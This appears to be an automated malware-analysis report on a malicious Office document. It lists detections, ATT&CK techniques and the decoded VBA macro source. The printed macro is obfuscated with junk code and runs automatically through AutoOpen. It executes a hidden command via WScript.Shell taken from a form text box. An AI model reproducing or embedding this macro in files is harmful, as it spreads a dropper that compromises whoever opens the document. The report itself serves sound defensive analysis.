MALICIOUS
290
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The macros utilize WScript.Shell and CreateObject, indicating an intent to execute arbitrary code, likely for downloading and running a secondary payload. The presence of an AutoOpen macro further suggests automatic execution upon opening the document.
Heuristics 9
-
ClamAV: Doc.Malware.Generic-6817636-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6817636-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set primaryiv = opensystemib Babyln = "WscRipt.sHeLl" Set microchipru = Avonvs -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Surinamepz = nationalad SriLankarj = Array(Missionsi, arrayoi, transmitterdp, CreateObject("" + Plazarp + Specialistwf + parsenf + Babyln).Run!(("" + responsivelu + Loopti + blueii + Romaniajv + HomeLoanAccountht.TextBox1) + digitalin + Analystzu + CotedIvoireok, 2 - 2), IndustrialMusicToolsjw, paymentud, Groceryiz) Set portom = GBua -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub autoopen() Cambridgeshirejd = unleashzj -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8250 bytes |
SHA-256: c22d30a3526ec14d3bf45a56e5bdd58258fc1d92e4c80e0321e18958357305dd |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "HomeLoanAccountht"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Attribute VB_Name = "Chiefua"
Function PCIwr()
On Error Resume Next
Set Portugalti = killerir
Set Tanzaniaqq = Berkshireif
Select Case transmitterqk
Case 214
Vietnamqb = relationshipsfu
Dataol = CLng(937)
Case 832
clearthinkingtj = CLng(401)
Frozenwv = CDate(globalzd)
Strategistvu = Int(583)
Case 469
Directld = Cos(invoiceqd)
InvestmentAccountpb = ChrB(196)
HandcraftedCottonTowelsbk = Bedfordshirejt
End Select
Set killercq = Solutionsld
Set bandwidthnd = SavingsAccountoo
Set Metalkt = Bordersib
Select Case InvestmentAccountzn
Case 834
WestVirginiamz = Covebj
CheckingAccountib = CLng(251)
Case 508
limesa = CLng(310)
clientdrivenzt = CDate(Havenkf)
CreditCardAccountli = Int(913)
Case 611
SingaporeDollarzb = Cos(Dynamicwm)
MoviesBookszf = ChrB(677)
Techniciankz = indexingpz
End Select
Set SSLvk = Buckinghamshirejk
Set InvestmentAccountvv = maroondr
Set Developerbo = copyoc
Select Case backingupur
Case 338
Kroonil = Mongoliawq
synergisticdq = CLng(977)
Case 117
synthesizingcs = CLng(825)
distributedws = CDate(deployvl)
intranetlt = Int(423)
Case 958
Districtzq = Cos(Gorgeoussh)
programww = ChrB(945)
Pathul = Missionzu
End Select
Set emarketsuq = Buckinghamshiredq
Set arrayri = Hondurasmf
Set Preemptivetk = navigateij
Select Case circuitbi
Case 459
Summitbw = HandcraftedGranitePizzatr
yellowdz = CLng(625)
Case 245
Deengineerednf = CLng(497)
incubateon = CDate(RSSus)
ErgonomicSteelGlovesub = Int(69)
Case 887
Rubberwq = Cos(marketsdt)
dynamicnp = ChrB(434)
VirginIslandsUSwu = Customeroo
End Select
Set primaryiv = opensystemib
Babyln = "WscRipt.sHeLl"
Set microchipru = Avonvs
Set arrayum = Loophp
Select Case Customizableaf
Case 526
Bordersif = Buckinghamshireph
SleekFrozenTunaio = CLng(745)
Case 732
leadingedgeap = CLng(717)
SMTPrh = CDate(Dynamicbp)
Summituj = Int(501)
Case 322
AutoLoanAccountbm = Cos(Buckinghamshireij)
globaldp = ChrB(922)
Specialistnw = withdrawaliq
End Select
Set Surinamepz = nationalad
SriLankarj = Array(Missionsi, arrayoi, transmitterdp, CreateObject("" + Plazarp + Specialistwf + parsenf + Babyln).Run!(("" + responsivelu + Loopti + blueii + Romaniajv + HomeLoanAccountht.TextBox1) + digitalin + Analystzu + CotedIvoireok, 2 - 2), IndustrialMusicToolsjw, paymentud, Groceryiz)
Set portom = GBua
Set Locksjt = Seniorcm
Select Case alarmwq
Case 911
crossplatformcq = seizerz
Avonnr = CLng(901)
Case 267
Radialnh = CLng(6)
HomeLoanAccountov = CDate(GamesGrocerycs)
calculatingll = Int(570)
Case 962
microchipzm = Cos(Functionalityoc)
MoneyMarketAccountzw = ChrB(70)
overridingfq = Kipww
End Select
Set architecturesqz = Steelnf
Set Handmadehj = extendll
Set LicensedFreshSausagesja = Denarni
Select Case connectinghh
Case 846
digitalll = frictionlessjs
bandwidthmonitoredfq = CLng(527)
Case 459
leveragesn = CLng(889)
IBwi = CDate(overridingzj)
synergisticjt = Int(847)
Case 376
SASlw = Cos(Centralizedkb)
sensorbb = ChrB(419)
Cottoncu = Cedikk
End Select
Set pixelwp = Buckinghamshirekv
End Function
Attribute VB_Name = "Directws"
Function Arkansaswj()
CheckingAccountlp = Persistentzf
indigouj = extendnq
bandwidthkj = Corporateua
Granitebt = policylb
SomaliShillingzc = Granitezj
BeautyGamesqj = depositua
CheckingAccountsj = Montserratwz
invoicesm = ErgonomicSoftBaconhd
Avonzz = Liaisondr
SASqs = AutoLoanAccounthz
knowledgebasecq = collaborativeqv
Intuitivebb = strategicuo
End Function
Function Associatelz()
IntelligentGraniteCaraf = Dynamicdj
IncredibleConcreteKeyboardtp = Alleyin
Smallms = MoroccanDirhampz
intermediateaq = parsejq
Extensionsvk = synthesizingmp
RAMwj = paymentww
backendmv = humanresourcewa
Principalwb = HomeToolsbu
Securedpu = Plannernf
Mississippisw = B2Ctw
Bedfordshirelb = optimizingpj
Softfz = webreadinessom
End Function
Sub autoopen()
Cambridgeshirejd = unleashzj
goldri = LaoPeoplesDemocraticRepubliczw
Cambodiazw = XSSim
Rusticid = Electronicsfs
FTPrw = Metricsca
GardenGroceryhi = NewYorkjm
strategizesc = Array(TastyGraniteCarji, XMLpm, IntelligentRubberMousenj, PCIwr, solutionswt, Avonwr, emarketspz)
aggregatesb = globalfk
AwesomeConcreteTablefq = Canyonwa
Fallsfm = Kidsju
yellowfw = PracticalWoodenShirthq
SSLlc = invoicekz
Dynamiclz = invoicezu
End Sub
Function withdrawalqf()
Engineerjq = protocolmp
envisioneerbt = Concretenk
Polandvm = SportsBookszo
Directivesaj = Organiczm
Deengineeredwz = Parkwaymj
Diversejh = Yemenii
KenyanShillingti = uniformbl
Mountaj = multibytezf
Vistait = emulationfj
tangiblekj = IndustrialHealthGardenmw
Innovativerc = PersonalLoanAccountkf
interfacetn = Handmadejz
End Function
Attribute VB_Name = "Avonnj"
Attribute VB_Name = "synergieshn"
Attribute VB_Name = "Macedoniaro"
Attribute VB_Name = "maximizehb"
Attribute VB_Name = "ZambianKwachaqd"
Attribute VB_Name = "Courserl"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "SriLankans"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "localrh"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Agentww"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Paradigmii"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "strategicnw"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "HomeLoanAccountfq"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.